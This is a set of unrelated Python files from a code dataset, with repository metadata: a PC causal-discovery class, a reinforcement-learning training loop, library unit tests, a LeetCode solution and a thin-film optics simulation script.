    undirected skeleton via conditional-independence tests,
    ``find_v_struct()`` orients colliders, and ``step1``-``step3`` apply
    Meek-style propagation rules.
    NOTE(review): indentation was reconstructed from a whitespace-mangled
    source; statement nesting (especially in test_indep and step1) should
    be double-checked against the upstream repository.
    """

    def __init__(self, X, confidence=0.05, whichseed=1):
        """X: (samples, variables) data matrix; confidence: p-value cutoff."""
        self.confidence = confidence
        self.cond_sets = dict()  # (p, q) -> separating set that made them independent
        self.X = X
        self.skeleton = None
        self.n = self.X.shape[1]
        # BUG FIX: test_indep does `self.number_tests += 1`, but the counter
        # was never initialized, raising AttributeError on first use.
        self.number_tests = 0
        np.random.seed(whichseed)

    def powerset(self, n, p, q, i):
        """Return all size-i subsets of range(n) containing neither p nor q."""
        xs = list(range(n))
        # The generator variable deliberately shadows parameter n: it runs
        # over subset sizes 0..len(xs).
        combinations = itertools.chain.from_iterable(itertools.combinations(xs, n) for n in range(len(xs) + 1))
        combinations = [x for x in combinations if len(x) == i and p not in x and q not in x]
        return combinations

    def find_forks(self, n):
        """Find unshielded triples: two undirected edges, no directed edge.

        Returns (middle_node, edge_nodes), one entry per triple; the middle
        node is the one adjacent to both others within the triple.
        """
        combinations = self.powerset(n, [], [], 3)
        combinations = [x for x in combinations
                        if (self.skeleton[x[0], x[1]] + self.skeleton[x[0], x[2]]
                            + self.skeleton[x[1], x[2]] == 2)
                        and (2 not in (self.skeleton[x[0], x[1]], self.skeleton[x[0], x[2]],
                                       self.skeleton[x[1], x[2]]))]
        middle_node = [[i for i in x if np.sum(self.skeleton[i, x]) == 2] for x in combinations]
        edge_nodes = [[i for i in x if not np.sum(self.skeleton[i, x]) == 2] for x in combinations]
        return middle_node, edge_nodes

    def cond_indep_test(self, X, Y, Z='empty'):
        """p-value for X independent of Y given Z (delegates to pred_indep)."""
        p_values_adj, temp, temp = pred_indep(Y, X, z=Z)
        return p_values_adj

    def test_indep(self, p, q, i):
        """Test columns p, q against every conditioning set of size i.

        Returns 1 while the pair looks dependent; returns 0 (recording the
        separating set) as soon as one test accepts independence.
        """
        if i == 0:
            depend = 1
            p_val, temp, temp = pred_indep(np.reshape(self.X[:, p], (-1, 1)), np.reshape(self.X[:, q], (-1, 1)))
            if p_val > self.confidence:
                depend = 0
                self.cond_sets[p, q] = ()
        else:
            n = self.X.shape[1]
            combinations = self.powerset(n, p, q, i)
            depend = 1
            for idx in combinations:
                p_val = self.cond_indep_test(np.reshape(self.X[:, p], (-1, 1)),
                                             np.reshape(self.X[:, q], (-1, 1)),
                                             np.reshape(self.X[:, idx], (-1, len(idx))))
                if p_val > self.confidence:  # / self.number_tests:
                    depend = 0
                    self.cond_sets[p, q] = idx
                    break
                self.number_tests += 1
        return depend

    def pc_skeleton(self):
        """Learn the undirected skeleton by pruning edges per subset size i."""
        n = self.n
        # Start from the complete (upper-triangular) graph.
        self.skeleton = np.array([[int(x > y) for x in range(n)] for y in range(n)])
        i = 0
        while i < n:
            for q in range(n):
                for p in range(n):
                    link = self.skeleton[p, q]
                    if link == 0:
                        pass
                    else:
                        self.skeleton[p, q] = self.test_indep(p, q, i)
            i += 1
        # Symmetrize: an edge survives if it survived in either direction.
        self.skeleton = np.maximum(self.skeleton, self.skeleton.transpose())
        print(self.cond_sets)
        return self.skeleton

    def step1(self):
        """Orient j - k as j -> k when some i -> j exists (Meek-style rule)."""
        old_skel = 0
        while old_skel < np.sum(self.skeleton == 2):
            old_skel = np.sum(self.skeleton == 2)
            for i in range(self.n):
                z = descendants(self.skeleton).dir_desc(i)
                if len(z) == 0:
                    continue
                for j in z:
                    y = descendants(self.skeleton).undir_neighb(j)
                    if len(y) == 0:
                        continue
                    for k in y:
                        self.skeleton[j, k] = 2
                        self.skeleton[k, j] = 0
                        break
                    break
                break

    def step2(self):
        """Orient i - y as i -> y when y is already a directed descendant of i."""
        old_skel = 0
        while old_skel < np.sum(self.skeleton == 2):
            old_skel = np.sum(self.skeleton == 2)
            for i in range(self.n):
                z = descendants(self.skeleton).all_desc(i)
                y = descendants(self.skeleton).undir_neighb(i)
                y = [x for x in y if x in z]
                if len(y) == 0:
                    continue
                self.skeleton[i, y] = 2
                self.skeleton[y, i] = 0
                break

    def step3(self):
        """Orient w -> middle for forks whose edge nodes both reach w."""
        old_skel = 0
        while old_skel < np.sum(self.skeleton == 2):
            old_skel = np.sum(self.skeleton == 2)
            middle_node, edge_nodes = self.find_forks(self.n)
            for i in range(len(middle_node)):
                x_desc = descendants(self.skeleton).dir_desc(edge_nodes[i][0])
                y_desc = descendants(self.skeleton).dir_desc(edge_nodes[i][1])
                z_neighb = descendants(self.skeleton).undir_neighb(middle_node[i])
                w = list(set(x_desc) & set(y_desc) & set(z_neighb))
                if len(w) == 0:
                    continue
                self.skeleton[w, middle_node[i]] = 2
                self.skeleton[middle_node[i], w] = 0
                break

    def find_v_struct(self):
        """Orient collider triples based on the recorded separating sets."""
        middle_node, edge_nodes = self.find_forks(self.n)
        for i in range(len(middle_node)):
            if middle_node[i][0] in self.cond_sets[tuple(edge_nodes[i])]:
                self.skeleton[middle_node[i][0], edge_nodes[i][0]] = 0
                self.skeleton[middle_node[i][0], edge_nodes[i][1]] = 0
                self.skeleton[edge_nodes[i][0], middle_node[i][0]] = 2
                self.skeleton[edge_nodes[i][1], middle_node[i][0]] = 2
        return self.skeleton

    def pc_dag(self):
        """Full pipeline: skeleton, v-structures, orientation, then plot.

        Returns the final adjacency divided by 2 (directed edges become 1).
        """
        self.pc_skeleton()
        print('finished skeleton learning')
        self.find_v_struct()
        old_skel = None
        # Apply the propagation rules until the orientation stabilizes.
        while not np.array_equal(old_skel, self.skeleton):
            old_skel = self.skeleton.copy()
            self.step1()
            self.step2()
            self.step3()
        # Orient remaining undirected edges away from nodes that already
        # have an incoming directed edge.
        for i in range(self.n):
            for j in range(i):
                if self.skeleton[i, j] == 1 and any(self.skeleton[:, i] == 2):
                    self.skeleton[i, j] = 2
                    self.skeleton[j, i] = 0
        # Derive an ancestral order: nodes that are nobody's descendant first.
        desc_dict = dict()
        for i in range(self.n):
            desc_dict[i] = descendants(self.skeleton).all_desc(i)
        i = 0
        ancestral_order = list()
        while len(desc_dict) > 0:
            desc_round = sum([desc_dict[i] for i in desc_dict], [])
            ancestral_order += [x for x in range(self.n) if x not in desc_round + ancestral_order]
            [desc_dict.pop(i, None) for i in ancestral_order]
            i += 1
        # Orient leftovers consistently with the ancestral order.
        for i in range(self.n):
            for j in range(i):
                if self.skeleton[i, j] == 1 and ancestral_order[i] > ancestral_order[j]:
                    self.skeleton[i, j] = 2
                    self.skeleton[j, i] = 0
        self.skeleton = self.skeleton / 2
        G = nx.from_numpy_matrix(self.skeleton, create_using=nx.DiGraph())
        nx.draw_networkx(G)
        plt.show()
        return self.skeleton
bf97afb110f8b2e8ba3c9d7ed701726cf642cd46 | 2,823 | py | Python | train.py | erick-alv/g-hgg | 2cc0de9810ca6823ad6339cf4d1a63e265d1b5ee | [
"MIT"
] | null | null | null | train.py | erick-alv/g-hgg | 2cc0de9810ca6823ad6339cf4d1a63e265d1b5ee | [
"MIT"
] | null | null | null | train.py | erick-alv/g-hgg | 2cc0de9810ca6823ad6339cf4d1a63e265d1b5ee | [
"MIT"
] | null | null | null | import numpy as np
import time
from common import get_args, experiment_setup
from copy import deepcopy
import pickle
import tensorflow as tf
if __name__=='__main__':
    # Getting arguments from command line + defaults.
    # Set up learning environment including gym env, ddpg agent,
    # hgg/normal learner, and tester.
    args = get_args()
    env, env_test, agent, buffer, learner, tester = experiment_setup(args)
    args.logger.summary_init(agent.graph, agent.sess)

    # Progress-info columns shown in the tabular log.
    args.logger.add_item('Epoch')
    args.logger.add_item('Cycle')
    args.logger.add_item('Episodes@green')  # '@green' presumably a logger color tag — TODO confirm
    args.logger.add_item('Timesteps')
    args.logger.add_item('TimeCost(sec)')
    best_success = -1  # best test success seen so far; gates best-policy saves

    # Algorithm info: scalar summaries exported by the agent.
    for key in agent.train_info.keys():
        args.logger.add_item(key, 'scalar')
    # Test info: scalar summaries exported by the tester.
    for key in tester.info:
        args.logger.add_item(key, 'scalar')
    args.logger.summary_setup()
    counter = 0  # NOTE(review): never read below — appears to be dead

    # Learning: epochs of cycles; one learner.learn() call per cycle.
    for epoch in range(args.epoches):
        for cycle in range(args.cycles):
            args.logger.tabular_clear()
            args.logger.summary_clear()
            start_time = time.time()
            # Learn one cycle; goal_list is only used for G-HGG plotting.
            goal_list = learner.learn(args, env, env_test, agent, buffer, write_goals=args.show_goals)
            # Log learning progress.
            tester.cycle_summary()
            args.logger.add_record('Epoch', str(epoch)+'/'+str(args.epoches))
            args.logger.add_record('Cycle', str(cycle)+'/'+str(args.cycles))
            args.logger.add_record('Episodes', buffer.counter)
            args.logger.add_record('Timesteps', buffer.steps_counter)
            args.logger.add_record('TimeCost(sec)', time.time()-start_time)
            # Save learning progress to progress.csv file.
            args.logger.save_csv()
            args.logger.tabular_show(args.tag)
            args.logger.summary_show(buffer.counter)
            # Save latest policy (overwritten every cycle).
            policy_file = args.logger.my_log_dir + "saved_policy-latest"
            agent.saver.save(agent.sess, policy_file)
            # Save policy if a new best success rate was reached.
            if args.logger.values["Success"] > best_success:
                best_success = args.logger.values["Success"]
                policy_file = args.logger.my_log_dir + "saved_policy-best"
                agent.saver.save(agent.sess, policy_file)
                args.logger.info("Saved as best policy to {}!".format(args.logger.my_log_dir))

        # Save periodic policy every epoch.
        policy_file = args.logger.my_log_dir + "saved_policy"
        agent.saver.save(agent.sess, policy_file, global_step=epoch)
        args.logger.info("Saved periodic policy to {}!".format(args.logger.my_log_dir))

        # Plot current goal distribution for visualization (G-HGG only);
        # uses goal_list from the last cycle of this epoch.
        if args.learn == 'hgg' and goal_list and args.show_goals != 0:
            name = "{}goals_{}".format(args.logger.my_log_dir, epoch)
            if args.graph:
                learner.sampler.graph.plot_graph(goals=goal_list, save_path=name)
            with open('{}.pkl'.format(name), 'wb') as file:
                pickle.dump(goal_list, file)
        tester.epoch_summary()

    tester.final_summary()
| 32.079545 | 93 | 0.735034 | 419 | 2,823 | 4.770883 | 0.28401 | 0.145073 | 0.078039 | 0.05953 | 0.241621 | 0.203102 | 0.14007 | 0.090545 | 0.058529 | 0 | 0 | 0.001233 | 0.138151 | 2,823 | 87 | 94 | 32.448276 | 0.820386 | 0.145944 | 0 | 0.072727 | 0 | 0 | 0.102671 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.109091 | 0 | 0.109091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf9c9f2ad47c2493e56e5746ab85cc6e452ae864 | 1,371 | py | Python | tests/fast/test_pickle.py | evinism/littlebaker | d4eac27c23999274397aecdb719c465b13306f26 | [
"MIT"
] | 19 | 2020-12-04T02:39:04.000Z | 2020-12-04T21:45:09.000Z | tests/fast/test_pickle.py | evinism/littlebaker | d4eac27c23999274397aecdb719c465b13306f26 | [
"MIT"
] | 13 | 2020-12-04T22:20:26.000Z | 2021-04-29T05:39:51.000Z | tests/fast/test_pickle.py | evinism/littlebaker | d4eac27c23999274397aecdb719c465b13306f26 | [
"MIT"
] | 1 | 2021-04-28T06:21:01.000Z | 2021-04-28T06:21:01.000Z | from tinybaker import Transform, InputTag, OutputTag, sequence
import pickle
class StepOne(Transform):
    """Pass the "foo" input through unchanged to the "bar" output."""
    foo = InputTag("foo")
    bar = OutputTag("bar")

    def script(self):
        with self.foo.open() as src:
            contents = src.read()
        with self.bar.open() as dst:
            dst.write(contents)
class StepTwo(Transform):
    """Copy "bar" to "baz", appending " processed" to the contents."""
    bar = InputTag("bar")
    baz = OutputTag("baz")

    def script(self):
        with self.bar.open() as src:
            contents = src.read()
        with self.baz.open() as dst:
            dst.write(contents + " processed")
class StepThree(Transform):
    """Join the "baz" and "bleep" inputs with a space into "boppo"."""
    baz = InputTag("baz")
    bleep = InputTag("bleep")
    boppo = OutputTag("boppo")

    def script(self):
        with self.baz.open() as src:
            first = src.read()
        with self.bleep.open() as src:
            second = src.read()
        with self.boppo.open() as dst:
            dst.write(first + " " + second)
# A nested sequence: StepOne feeds a sub-sequence of StepTwo then StepThree.
BaseSeq = sequence([StepOne, sequence([StepTwo, StepThree])])


def test_pickle_nested_sequence():
    """A nested sequence must survive a pickle round-trip and still run."""
    restored = pickle.loads(pickle.dumps(BaseSeq))
    restored(
        input_paths={
            "foo": "./tests/__data__/foo.txt",
            "bleep": "./tests/__data__/bleep.txt",
        },
        output_paths={"boppo": "/tmp/boppo"},
        overwrite=True,
    ).run()
    with open("/tmp/boppo", "r") as result:
        assert result.read() == "foo contents processed bleep contents"
| 23.637931 | 66 | 0.557257 | 166 | 1,371 | 4.524096 | 0.283133 | 0.031957 | 0.065246 | 0.069241 | 0.263648 | 0.201065 | 0.095872 | 0.095872 | 0 | 0 | 0 | 0.002064 | 0.293217 | 1,371 | 57 | 67 | 24.052632 | 0.772962 | 0 | 0 | 0.238095 | 0 | 0 | 0.114515 | 0.03647 | 0 | 0 | 0 | 0 | 0.02381 | 1 | 0.095238 | false | 0 | 0.047619 | 0 | 0.380952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf9d1c229636cf8e73b8136dc8f76f750b3401fc | 1,711 | py | Python | tests/actors/accessibility/test_accessibility.py | reapler/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-12-24T04:37:02.000Z | 2021-12-24T04:37:02.000Z | tests/actors/accessibility/test_accessibility.py | jpramosi/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-07-23T13:38:36.000Z | 2021-08-07T14:17:54.000Z | tests/actors/accessibility/test_accessibility.py | reapler/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-10-31T17:31:35.000Z | 2021-10-31T17:31:35.000Z | # pylint: disable=unused-import
import pytest
import tests.helpers.constants as constants
from tests.helpers.utils import *
from geckordp.rdp_client import RDPClient
from geckordp.actors.root import RootActor
from geckordp.actors.descriptors.tab import TabActor
from geckordp.actors.accessibility.accessibility import AccessibilityActor
from geckordp.logger import log, logdict
def init():
    """Connect to the remote browser and return (client, accessibility actor)."""
    client = RDPClient(3)
    client.connect(constants.REMOTE_HOST, constants.REMOTE_PORT)
    root = RootActor(client)
    tab_descriptor = root.current_tab()
    tab = TabActor(client, tab_descriptor["actor"])
    target_ids = tab.get_target()
    accessibility = AccessibilityActor(client, target_ids["accessibilityActor"])
    accessibility.bootstrap()
    return client, accessibility
def test_get_traits():
    """get_traits() must expose the 'tabbingOrder' trait."""
    cl = None
    try:
        cl, accessibility = init()
        val = accessibility.get_traits()
        assert val.get("tabbingOrder", None) is not None
    finally:
        # BUG FIX: if init() raised, cl is still None and calling
        # disconnect() would raise AttributeError, masking the real error.
        if cl is not None:
            cl.disconnect()
def test_bootstrap():
    """bootstrap() must return a non-empty payload."""
    cl = None
    try:
        cl, accessibility = init()
        val = accessibility.bootstrap()
        assert len(val.keys()) > 0
    finally:
        # BUG FIX: guard against init() failing before cl was assigned.
        if cl is not None:
            cl.disconnect()
def test_get_walker():
    """get_walker() must return an actor reference."""
    cl = None
    try:
        cl, accessibility = init()
        val = accessibility.get_walker()
        assert val.get("actor", None) is not None
    finally:
        # BUG FIX: guard against init() failing before cl was assigned.
        if cl is not None:
            cl.disconnect()
def test_get_simulator():
    """get_simulator() returns no actor when firefox runs headless."""
    cl = None
    try:
        cl, accessibility = init()
        val = accessibility.get_simulator()
        simulator_id = val.get("actor", None)
        if (simulator_id is None):
            log("No simulator actor found, firefox is probably running in headless mode")
    finally:
        # BUG FIX: guard against init() failing before cl was assigned.
        if cl is not None:
            cl.disconnect()
| 26.734375 | 89 | 0.670953 | 202 | 1,711 | 5.579208 | 0.331683 | 0.053239 | 0.031943 | 0.039042 | 0.261757 | 0.261757 | 0.233363 | 0.233363 | 0.194321 | 0 | 0 | 0.001524 | 0.233197 | 1,711 | 63 | 90 | 27.15873 | 0.85747 | 0.016949 | 0 | 0.384615 | 0 | 0 | 0.068452 | 0 | 0 | 0 | 0 | 0 | 0.057692 | 1 | 0.096154 | false | 0 | 0.153846 | 0 | 0.269231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa007f01f0521a3952080258ba83656a9eeaff7 | 564 | py | Python | py/leetcode/DungeonGame.py | danyfang/SourceCode | 8168f6058648f2a330a7354daf3a73a4d8a4e730 | [
"MIT"
] | null | null | null | py/leetcode/DungeonGame.py | danyfang/SourceCode | 8168f6058648f2a330a7354daf3a73a4d8a4e730 | [
"MIT"
] | null | null | null | py/leetcode/DungeonGame.py | danyfang/SourceCode | 8168f6058648f2a330a7354daf3a73a4d8a4e730 | [
"MIT"
] | null | null | null | '''
Leetcode problem No 174 Dungeon Game
Solution written by Xuqiang Fang on 5 July, 2018
'''
class Solution(object):
    def calculateMinimumHP(self, dungeon):
        """Return the minimum initial HP needed to traverse the dungeon.

        One-row DP scanned bottom-up and right-to-left: DP[j] holds the
        minimum HP required when *entering* cell (i, j).  The virtual cell
        past the princess is seeded with 1 HP (must always stay positive).
        """
        DP = [float("inf") for _ in dungeon[0]]
        DP[-1] = 1
        # BUG FIX: `xrange` is Python 2 only; replaced with `range`.
        for i in reversed(range(len(dungeon))):
            DP[-1] = max(DP[-1] - dungeon[i][-1], 1)
            for j in reversed(range(len(dungeon[i]) - 1)):
                # Enter (i, j) needing enough to survive the cheaper exit.
                min_HP_on_exit = min(DP[j], DP[j + 1])
                DP[j] = max(min_HP_on_exit - dungeon[i][j], 1)
        return DP[0]
def main():
s = Solution()
| 26.857143 | 62 | 0.547872 | 85 | 564 | 3.552941 | 0.458824 | 0.029801 | 0.033113 | 0.125828 | 0.172185 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047859 | 0.296099 | 564 | 20 | 63 | 28.2 | 0.712846 | 0.150709 | 0 | 0 | 0 | 0 | 0.006369 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa0480628cbd64765f0e794d146b8b1cadeec58 | 10,288 | py | Python | pw_make_radcool_structure.py | parkerwray/tmm | 8c27a56163d33de5955611eee35864c4485d1b2b | [
"MIT"
] | null | null | null | pw_make_radcool_structure.py | parkerwray/tmm | 8c27a56163d33de5955611eee35864c4485d1b2b | [
"MIT"
] | null | null | null | pw_make_radcool_structure.py | parkerwray/tmm | 8c27a56163d33de5955611eee35864c4485d1b2b | [
"MIT"
] | null | null | null | """
Import relevant modules
"""
from __future__ import division, print_function, absolute_import
#from tmm.tmm_core import (coh_tmm, unpolarized_RT, ellips,
# position_resolved, find_in_structure_with_inf)
from wptherml.wptherml.datalib import datalib
import tmm.tmm_core as tmm
from numpy import linspace, inf, pi, stack, array
import matplotlib.pyplot as plt
import matplotlib as mplib
from scipy.interpolate import interp1d, InterpolatedUnivariateSpline
#mplib.rcParams['lines.linewidth'] = 8
#mplib.rcParams['lines.markersize'] = 6
#mplib.rcParams['axes.titlesize'] = 30
#mplib.rcParams['axes.labelsize'] = 24
#mplib.rcParams['xtick.labelsize'] = 20
#mplib.rcParams['ytick.labelsize'] = 20
#mplib.rcParams['font.size'] = 20
"""
Define wavelength range of interest and layer thicknesses
"""
nm = 1e-9  # metres per nanometre: SI conversion factor for datalib calls
lda = linspace(250, 30000,5000) # list of wavelengths in nm (UV through far-IR)
##############################################################################
##############################################################################
#%%
#"""
#Run the TMM code per wavelength for SiO2 NP on Si using FITTED MATERIALS
#"""
#
#T_list = [];
#R_list = [];
#A_list = [];
#for lda0 in lda:
# n_list = [1, msio2rough_fn(lda0), msio2np_fn(lda0), msio2_fn(lda0), msi_fn(lda0), 1]
# inc_tmm_data = tmm.inc_tmm('s',n_list,d_list,c_list,theta,lda0)
# A_list.append(tmm.inc_absorp_in_each_layer(inc_tmm_data)) #stores as list of np.arrays
# T_list.append(inc_tmm_data['T'])
# R_list.append(inc_tmm_data['R'])
#
#Afit = stack(A_list, axis = 0) # convert list of np.arrays to single np.array
#Tfit = array(T_list, dtype = complex) # Convert list to array for math operations
#Rfit = array(R_list, dtype = complex) # Convert list to array for math operations
##############################################################################
##############################################################################
#%%
"""
Run the TMM code per wavelength for SiO2 NP on Si using IDEAL MATERIALS
"""
"""
Define materials of interest for layered film simulation
Notes:
1) materials are described in SI units
2) materials are stored in datalib
3) materials are output as m = n+j*k
4) materials are iterpolated in datalib based on input lda values
"""
#
#structure = {
# ### computation mode - inline means the structure and calculation
# ### type will be determined from the values of this dictionary
# 'mode': 'Inline',
# ### temperature of the structure - relevant for all thermal applications
# ### value is stored in attribute self.T
# 'Temperature': 500,
# ### actual materials the structure is made from
# ### values are stored in the attribute self.n
# #'Material_List': ['Air','SiO2', 'SiO2','Si3N4','Ag', 'Air'],
# 'Material_List': ['Air','Si3N4','SiO2','SiO2','Si3N4', 'Ag', 'Air'],
# ### thickness of each layer... terminal layers must be set to zero
# ### values are stored in attribute self.d
# 'Thickness_List': [0, 1.0e-6, 1.0e-6, 3.0e-6, 650e-9, 200.0e-9, 0], # You can not have the back reflector as the last layer!!!
# ### range of wavelengths optical properties will be calculated for
# ### values are stored in the array self.lam
# 'Lambda_List': [250e-9, 15000e-9, 5000],
# ## Calculate for explicit angular dependence
# 'EXPLICIT_ANGLE': 1,
# ## Calculate quantities related to radiative cooling
# 'COOLING': 1
# }
#
#
# Tabulated refractive indices wrapped as interpolating functions of
# wavelength in nm (datalib expects SI wavelengths, hence lda*nm).
m = datalib.Material_RI(lda*nm, 'Si3N4') #convert lda to SI unit
msi3n4_fn = interp1d(lda, m, kind='linear') # make mat data a FUNCTION of lda, in nm
m = datalib.Material_RI(lda*nm, 'SiO2') #convert lda to SI unit
msio2_fn = interp1d(lda, m, kind='linear') # make mat data a FUNCTION of lda, in nm
m = datalib.Material_RI(lda*nm, 'Ag') #convert lda to SI unit
mag_fn = interp1d(lda, m, kind='linear') # make mat data a FUNCTION of lda, in nm
# Effective-medium (Bruggeman) indices for 30% fill-fraction nanoparticle
# layers in air.
m = datalib.alloy(lda*nm, 0.30, 'Air','SiO2','Bruggeman')
msio2np_ideal_fn = interp1d(lda, m, kind='linear') # make mat data a FUNCTION of lda, in nm
m = datalib.alloy(lda*nm, 0.30, 'Air','Si3N4','Bruggeman')
msi3n4np_ideal_fn = interp1d(lda, m, kind='linear') # make mat data a FUNCTION of lda, in nm
# NOTE(review): msi3n4_fn and msio2_fn are defined but unused in the n_list
# below — presumably leftovers from an earlier stack configuration.

# Stack: air / Si3N4 NP (800 nm) / SiO2 NP (2000 nm) / Ag (200 nm) / air.
d_list = [inf, 800, 2000, 200, inf] # list of layer thicknesses in nm
c_list = ['i','c','c','c','i']  # incoherent ('i') / coherent ('c') flag per layer
theta = 0  # incidence angle (normal)

T_list = [];
R_list = [];
A_list = [];
# Incoherent TMM sweep over all wavelengths, s polarization.
for lda0 in lda:
    n_list = [1, msi3n4np_ideal_fn(lda0), msio2np_ideal_fn(lda0), mag_fn(lda0), 1]
    inc_tmm_data = tmm.inc_tmm('s',n_list,d_list,c_list,theta,lda0)
    A_list.append(tmm.inc_absorp_in_each_layer(inc_tmm_data)) #stores as list of np.arrays
    T_list.append(inc_tmm_data['T'])
    R_list.append(inc_tmm_data['R'])

A = stack(A_list, axis = 0) # convert list of np.arrays to single np.array (rows = wavelengths)
T = array(T_list, dtype = complex) # Convert list to array for math operations
R = array(R_list, dtype = complex) # Convert list to array for math operations
##############################################################################
##############################################################################
#%%
"""
Plot TMM result with measured result
"""
#plt.figure()
#plt.plot(lda,Rref*100,'k--', label = 'Si Reflection')
##plt.plot(lda, (np_TR)*cal*100, 'k', label = 'Measured structure reflection')
#plt.plot(lda, Rideal*100,'k:', label = 'Bruggeman structure reflection')
#
##plt.plot(lda, (si_vis_TR-np_vis_TR)*cal*100,'r', label = 'Measured SiO2 NP absorption')
##plt.plot(lda, (A[:,1]+A[:,2]+A[:,3])*100,'r:', label = 'Fitted Bruggeman SiO2 NP absorption')
##plt.plot(lda, (Aideal[:,1]+Aideal[:,2]+Aideal[:,3])*100,'r--', label = 'Ideal Bruggeman SiO2 NP absorption')
#
##plt.plot(lda, Aideal[:,1]*100,'r:', label = 'Bruggeman SiO2 NP roughness absorption')
##plt.plot(lda, Aideal[:,2]*100,'r', label = 'Bruggeman SiO2 NP film absorption')
##plt.plot(lda, Aideal[:,4]*100,'r--', label = 'Bruggeman Si absorption')
##plt.plot(lda, A[:,3]*100,'r', label = 'SiO2 native oxide absorption')
#
##plt.plot(lda, 1-np_vis_TR*cal, label = 'Measured film Absorption')
#
##plt.plot(lda, si_vis_TR*cal, label = 'Measured si reflection')
#plt.xlabel('Wavelength (nm)')
#plt.ylabel('%')
#plt.title('Transmission, reflection, and absorption at normal incidence')
#plt.legend()
#plt.show()
##############################################################################
##############################################################################
#%%
"""
Plot R and T TMM and measured result
"""
#plt.figure()
#plt.plot(lda, T*100,'b:', label = 'Transmission')
#plt.plot(lda, R*100,'k:', label = 'Reflection')
#plt.plot(lda, (1-T-R)*100,':', label = 'Absorption')
#plt.plot(lda, A[:,1]*100,':', label = 'Abs. layer 1 \n (30% $Si_{3}N_{4}$ Brugg.)')
#plt.plot(lda, A[:,1]*100,':', label = 'Abs. layer 2 \n (30% $SiO_{2}$ Brugg.)')
#plt.plot(lda, A[:,1]*100,':', label = 'Abs. layer 3 \n (Bulk $SiO_{2}$)')
#plt.plot(lda, A[:,1]*100,':', label = 'Abs. layer 4 \n (Bulk $Si_{3}N_{4}$)')
#plt.plot(lda, A[:,1]*100,':', label = 'Abs. layer 5 \n (Ag reflector)')
#plt.xlabel('Wavelength (nm)')
#plt.ylabel('%')
#plt.title('Transmission, reflection, and absorption at normal incidence')
#plt.legend()
#plt.show()
##############################################################################
##############################################################################
#%%
"""
Plot TMM and measured absorption
"""
# Plot the absorption spectra.  The branch selects IR-style plotting (with
# the atmospheric transmittance window overlaid) when the wavelength grid
# starts above ~2 um, otherwise solar-style plotting against AM1.5.
# NOTE(review): lda starts at 250 nm above, so the else branch always runs
# here — the if branch presumably serves other lda settings; confirm.
if (min(lda) > 1999):
    t_atmosphere = datalib.ATData(lda*1e-9)
    fig = plt.figure()
    plt.plot(lda*1e-3, t_atmosphere*100,'k', alpha = 0.1, label='Atmospheric \n transmittance')
    plt.plot(lda*1e-3, (1-T-R)*100,'r', label = 'Device absorption')
    # NOTE(review): the stack built above yields 5 columns per row of A
    # (ambient / 3 layers / ambient), so A[:,5] would be out of range —
    # these labels match the older 6-layer commented-out structure; verify.
    plt.plot(lda*1e-3, A[:,1]*100,':', label = 'Abs. $Si_{3}N_{4}$ NP \n (30%, Brugg.)')
    plt.plot(lda*1e-3, A[:,2]*100,':', label = 'Abs. $SiO_{2}$ NP \n (30%, Brugg.)')
    plt.plot(lda*1e-3, A[:,3]*100,':', label = 'Abs. $SiO_{2}$')
    plt.plot(lda*1e-3, A[:,4]*100,':', label = 'Abs. $Si_{3}N_{4}$')
    plt.plot(lda*1e-3, A[:,5]*100,':', label = 'Abs. $Ag$')
    plt.xlabel('Wavelength (nm)')  # NOTE(review): x data is lda*1e-3 (um); label says nm
    plt.ylabel('%')
    #plt.title('Transmission, reflection, and absorption at normal incidence')
    plt.legend()
    plt.show()
#    plt.plot(lda*1e-3, (1-np_R*calR-np_T*calT)*100,'k', label = 'Total absorption \n (measured)')
#    plt.plot(lda*1e-3, (1-Tideal-Rideal)*100, 'k:', label = 'Total absorption \n (simulated)')
#    plt.plot(lda*1e-3, Aideal[:,1]*100,'b:', label = 'Roughness layer \n (9% $SiO_{2}$ Brugg.)')
#    plt.plot(lda*1e-3, Aideal[:,2]*100,'r:', label = 'Nanoparticle layer \n (15% $SiO_2$ Brugg.)')
#    plt.plot(lda*1e-3, Aideal[:,4]*100,'m:', label = 'Si Substrate')
#    #plt.plot(lda, Aideal[:,3]*100,'y:', label = 'SiO2 native oxide absorption')
#
#    plt.xlabel('Wavelength (um)')
#    plt.ylabel('Absorption (%)')
#    #plt.title('Absorption at normal incidence')
#    #ax.legend().draggable()
#    plt.tight_layout(rect=[-0.10,0,0.75,1])
#    plt.legend(bbox_to_anchor=(1.04, 1))
#    plt.show()
else:
    AM1p5 = datalib.AM(lda*1e-9)
    fig = plt.figure()
    plt.plot(lda, (AM1p5/(1.4*1e9))*100,'k', alpha = 0.1, label='AM1.5')
#    plt.plot(lda, T*100,'b:', label = 'Transmission')
#    plt.plot(lda, R*100,'k:', label = 'Reflection')
